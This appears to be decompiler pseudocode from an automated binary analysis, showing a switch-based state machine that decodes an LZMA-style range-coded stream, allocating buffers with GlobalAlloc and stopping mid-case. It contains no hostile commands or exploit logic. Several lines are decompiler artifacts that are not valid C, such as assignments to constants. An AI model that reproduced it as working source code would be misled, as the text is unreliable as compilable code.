                                                                                            								while(1) {
                                                                                            									L1:
                                                                                            									_t534 =  *(_t612 - 0x88);
                                                                                            									if(_t534 > 0x1c) {
                                                                                            										break;
                                                                                            									}
                                                                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                                                                                            										case 0:
                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                            											_t534 =  *( *(_t612 - 0x70));
                                                                                            											if(_t534 > 0xe1) {
                                                                                            												goto L171;
                                                                                            											}
                                                                                            											_t538 = _t534 & 0x000000ff;
                                                                                            											_push(0x2d);
                                                                                            											asm("cdq");
                                                                                            											_pop(_t569);
                                                                                            											_push(9);
                                                                                            											_pop(_t570);
                                                                                            											_t608 = _t538 / _t569;
                                                                                            											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                            											asm("cdq");
                                                                                            											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                            											 *(_t612 - 0x3c) = _t603;
                                                                                            											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                            											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                            											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                            											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                            												L10:
                                                                                            												if(_t611 == 0) {
                                                                                            													L12:
                                                                                            													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                            													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                            													goto L15;
                                                                                            												} else {
                                                                                            													goto L11;
                                                                                            												}
                                                                                            												do {
                                                                                            													L11:
                                                                                            													_t611 = _t611 - 1;
                                                                                            													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                            												} while (_t611 != 0);
                                                                                            												goto L12;
                                                                                            											}
                                                                                            											if( *(_t612 - 4) != 0) {
                                                                                            												GlobalFree( *(_t612 - 4));
                                                                                            											}
                                                                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                            											 *(_t612 - 4) = _t534;
                                                                                            											if(_t534 == 0) {
                                                                                            												goto L171;
                                                                                            											} else {
                                                                                            												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                            												goto L10;
                                                                                            											}
                                                                                            										case 1:
                                                                                            											L13:
                                                                                            											__eflags =  *(_t612 - 0x6c);
                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                            												 *(_t612 - 0x88) = 1;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                            											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                            											_t45 = _t612 - 0x48;
                                                                                            											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                            											__eflags =  *_t45;
                                                                                            											L15:
                                                                                            											if( *(_t612 - 0x48) < 4) {
                                                                                            												goto L13;
                                                                                            											}
                                                                                            											_t546 =  *(_t612 - 0x40);
                                                                                            											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                            												L20:
                                                                                            												 *(_t612 - 0x48) = 5;
                                                                                            												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                            												goto L23;
                                                                                            											}
                                                                                            											 *(_t612 - 0x74) = _t546;
                                                                                            											if( *(_t612 - 8) != 0) {
                                                                                            												GlobalFree( *(_t612 - 8));
                                                                                            											}
                                                                                            											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                            											 *(_t612 - 8) = _t534;
                                                                                            											if(_t534 == 0) {
                                                                                            												goto L171;
                                                                                            											} else {
                                                                                            												goto L20;
                                                                                            											}
                                                                                            										case 2:
                                                                                            											L24:
                                                                                            											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                            											 *(_t612 - 0x84) = 6;
                                                                                            											 *(_t612 - 0x4c) = _t553;
                                                                                            											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                            											goto L132;
                                                                                            										case 3:
                                                                                            											L21:
                                                                                            											__eflags =  *(_t612 - 0x6c);
                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                            												 *(_t612 - 0x88) = 3;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                            											_t67 = _t612 - 0x70;
                                                                                            											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                            											__eflags =  *_t67;
                                                                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                            											L23:
                                                                                            											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                            											if( *(_t612 - 0x48) != 0) {
                                                                                            												goto L21;
                                                                                            											}
                                                                                            											goto L24;
                                                                                            										case 4:
                                                                                            											L133:
                                                                                            											_t531 =  *_t605;
                                                                                            											_t588 = _t531 & 0x0000ffff;
                                                                                            											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                            											if( *(_t612 - 0xc) >= _t564) {
                                                                                            												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                            												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                            												 *(_t612 - 0x40) = 1;
                                                                                            												_t532 = _t531 - (_t531 >> 5);
                                                                                            												__eflags = _t532;
                                                                                            												 *_t605 = _t532;
                                                                                            											} else {
                                                                                            												 *(_t612 - 0x10) = _t564;
                                                                                            												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                            												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                            											}
                                                                                            											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                            												goto L139;
                                                                                            											} else {
                                                                                            												goto L137;
                                                                                            											}
                                                                                            										case 5:
                                                                                            											L137:
                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                            												 *(_t612 - 0x88) = 5;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                            											L139:
                                                                                            											_t533 =  *(_t612 - 0x84);
                                                                                            											goto L140;
                                                                                            										case 6:
                                                                                            											__edx = 0;
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                            												 *(__ebp - 0x34) = 1;
                                                                                            												 *(__ebp - 0x84) = 7;
                                                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                            												goto L132;
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                            											__esi =  *(__ebp - 0x60);
                                                                                            											__cl = 8;
                                                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                            											__ecx =  *(__ebp - 0x3c);
                                                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                            											__ecx =  *(__ebp - 4);
                                                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            											if( *(__ebp - 0x38) >= 4) {
                                                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                                                            													_t98 = __ebp - 0x38;
                                                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                            													__eflags =  *_t98;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                            												}
                                                                                            											} else {
                                                                                            												 *(__ebp - 0x38) = 0;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                            											if( *(__ebp - 0x34) == __edx) {
                                                                                            												__ebx = 0;
                                                                                            												__ebx = 1;
                                                                                            												goto L61;
                                                                                            											} else {
                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                            													__eflags = __eax;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 8);
                                                                                            												__ebx = 0;
                                                                                            												__ebx = 1;
                                                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                            												goto L41;
                                                                                            											}
                                                                                            										case 7:
                                                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                                                            											if( *(__ebp - 0x40) != 1) {
                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                            												 *(__ebp - 0x80) = 0x16;
                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            												__eax = 0;
                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            												__al = __al & 0x000000fd;
                                                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                                                            												__eflags = __eax;
                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                            												goto L69;
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 4);
                                                                                            											__ecx =  *(__ebp - 0x38);
                                                                                            											 *(__ebp - 0x84) = 8;
                                                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                            											goto L132;
                                                                                            										case 8:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                            												 *(__ebp - 0x84) = 0xa;
                                                                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                            											} else {
                                                                                            												__eax =  *(__ebp - 0x38);
                                                                                            												__ecx =  *(__ebp - 4);
                                                                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                            												 *(__ebp - 0x84) = 9;
                                                                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                            											}
                                                                                            											goto L132;
                                                                                            										case 9:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												goto L90;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x60);
                                                                                            											if( *(__ebp - 0x60) == 0) {
                                                                                            												goto L171;
                                                                                            											}
                                                                                            											__eax = 0;
                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                            											__eflags = _t259;
                                                                                            											0 | _t259 = _t259 + _t259 + 9;
                                                                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                            											goto L76;
                                                                                            										case 0xa:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                            												 *(__ebp - 0x84) = 0xb;
                                                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                            												goto L132;
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 0x28);
                                                                                            											goto L89;
                                                                                            										case 0xb:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												__ecx =  *(__ebp - 0x24);
                                                                                            												__eax =  *(__ebp - 0x20);
                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            											} else {
                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x28);
                                                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            											L89:
                                                                                            											__ecx =  *(__ebp - 0x2c);
                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            											L90:
                                                                                            											__eax =  *(__ebp - 4);
                                                                                            											 *(__ebp - 0x80) = 0x15;
                                                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                            											goto L69;
                                                                                            										case 0xc:
                                                                                            											L100:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0xc;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t335 = __ebp - 0x70;
                                                                                            											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t335;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											__eax =  *(__ebp - 0x2c);
                                                                                            											goto L102;
                                                                                            										case 0xd:
                                                                                            											L37:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0xd;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t122 = __ebp - 0x70;
                                                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t122;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											L39:
                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                            												goto L48;
                                                                                            											}
                                                                                            											__eflags = __ebx - 0x100;
                                                                                            											if(__ebx >= 0x100) {
                                                                                            												goto L54;
                                                                                            											}
                                                                                            											L41:
                                                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                            											 *(__ebp - 0x48) = __eax;
                                                                                            											__eax = __eax + 1;
                                                                                            											__eax = __eax << 8;
                                                                                            											__eax = __eax + __ebx;
                                                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            											__ax =  *__esi;
                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                            											__edx = __ax & 0x0000ffff;
                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            												__cx = __ax;
                                                                                            												 *(__ebp - 0x40) = 1;
                                                                                            												__cx = __ax >> 5;
                                                                                            												__eflags = __eax;
                                                                                            												__ebx = __ebx + __ebx + 1;
                                                                                            												 *__esi = __ax;
                                                                                            											} else {
                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                            												0x800 = 0x800 - __edx;
                                                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                            												__ebx = __ebx + __ebx;
                                                                                            												 *__esi = __cx;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            												goto L39;
                                                                                            											} else {
                                                                                            												goto L37;
                                                                                            											}
                                                                                            										case 0xe:
                                                                                            											L46:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t156 = __ebp - 0x70;
                                                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t156;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											while(1) {
                                                                                            												L48:
                                                                                            												__eflags = __ebx - 0x100;
                                                                                            												if(__ebx >= 0x100) {
                                                                                            													break;
                                                                                            												}
                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                            												__edx = __ebx + __ebx;
                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                            												__esi = __edx + __eax;
                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            												__ax =  *__esi;
                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            													__cx = __ax;
                                                                                            													_t170 = __edx + 1; // 0x1
                                                                                            													__ebx = _t170;
                                                                                            													__cx = __ax >> 5;
                                                                                            													__eflags = __eax;
                                                                                            													 *__esi = __ax;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                            													0x800 = 0x800 - __edi;
                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            													__ebx = __ebx + __ebx;
                                                                                            													 *__esi = __cx;
                                                                                            												}
                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            													continue;
                                                                                            												} else {
                                                                                            													goto L46;
                                                                                            												}
                                                                                            											}
                                                                                            											L54:
                                                                                            											_t173 = __ebp - 0x34;
                                                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                            											__eflags =  *_t173;
                                                                                            											goto L55;
                                                                                            										case 0xf:
                                                                                            											L58:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0xf;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t203 = __ebp - 0x70;
                                                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t203;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											L60:
                                                                                            											__eflags = __ebx - 0x100;
                                                                                            											if(__ebx >= 0x100) {
                                                                                            												L55:
                                                                                            												__al =  *(__ebp - 0x44);
                                                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                            												goto L56;
                                                                                            											}
                                                                                            											L61:
                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                            											__edx = __ebx + __ebx;
                                                                                            											__ecx =  *(__ebp - 0x10);
                                                                                            											__esi = __edx + __eax;
                                                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            											__ax =  *__esi;
                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            												__cx = __ax;
                                                                                            												_t217 = __edx + 1; // 0x1
                                                                                            												__ebx = _t217;
                                                                                            												__cx = __ax >> 5;
                                                                                            												__eflags = __eax;
                                                                                            												 *__esi = __ax;
                                                                                            											} else {
                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                            												0x800 = 0x800 - __edi;
                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            												__ebx = __ebx + __ebx;
                                                                                            												 *__esi = __cx;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            												goto L60;
                                                                                            											} else {
                                                                                            												goto L58;
                                                                                            											}
                                                                                            										case 0x10:
                                                                                            											L110:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0x10;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t366 = __ebp - 0x70;
                                                                                            											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                            											__eflags =  *_t366;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											goto L112;
                                                                                            										case 0x11:
                                                                                            											L69:
                                                                                            											__esi =  *(__ebp - 0x58);
                                                                                            											 *(__ebp - 0x84) = 0x12;
                                                                                            											L132:
                                                                                            											 *(_t612 - 0x54) = _t605;
                                                                                            											goto L133;
                                                                                            										case 0x12:
                                                                                            											goto L0;
                                                                                            										case 0x13:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												_t469 = __ebp - 0x58;
                                                                                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                            												__eflags =  *_t469;
                                                                                            												 *(__ebp - 0x30) = 0x10;
                                                                                            												 *(__ebp - 0x40) = 8;
                                                                                            												goto L144;
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 0x4c);
                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                            											__eax =  *(__ebp - 0x4c) << 4;
                                                                                            											 *(__ebp - 0x30) = 8;
                                                                                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                            											goto L130;
                                                                                            										case 0x14:
                                                                                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                            											__eax =  *(__ebp - 0x80);
                                                                                            											L140:
                                                                                            											 *(_t612 - 0x88) = _t533;
                                                                                            											goto L1;
                                                                                            										case 0x15:
                                                                                            											__eax = 0;
                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            											__al = __al & 0x000000fd;
                                                                                            											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                            											goto L121;
                                                                                            										case 0x16:
                                                                                            											__eax =  *(__ebp - 0x30);
                                                                                            											__eflags = __eax - 4;
                                                                                            											if(__eax >= 4) {
                                                                                            												_push(3);
                                                                                            												_pop(__eax);
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 4);
                                                                                            											 *(__ebp - 0x40) = 6;
                                                                                            											__eax = __eax << 7;
                                                                                            											 *(__ebp - 0x7c) = 0x19;
                                                                                            											 *(__ebp - 0x58) = __eax;
                                                                                            											goto L145;
                                                                                            										case 0x17:
                                                                                            											goto L145;
                                                                                            										case 0x18:
                                                                                            											L146:
                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0x18;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
